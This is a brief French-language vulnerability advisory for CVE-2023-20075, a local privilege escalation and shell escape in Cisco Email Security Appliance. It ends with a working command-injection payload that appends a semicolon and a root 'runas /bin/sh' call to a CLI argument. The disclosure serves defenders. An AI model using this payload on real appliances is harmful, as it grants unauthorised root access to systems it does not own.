
Cisco Email Security Appliance : Élévation de privilèges locale et évasion de shell
Chercheur en sécurité : ly1g3, ly1g3[at]tuta.io
Empreinte GPG : https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Aperçu : Élévation de privilèges locale et évasion de shell
CVE : CVE-2023-20075
Chronologie :
ESA (Cisco Secure Email)
Un utilisateur authentifié ayant accès au cli peut élever ses privilèges jusqu'à root et exécuter du code arbitraire
logcollector36;/bin/sh/data/release/phoebe-14*/bin/runas 0 /bin/sh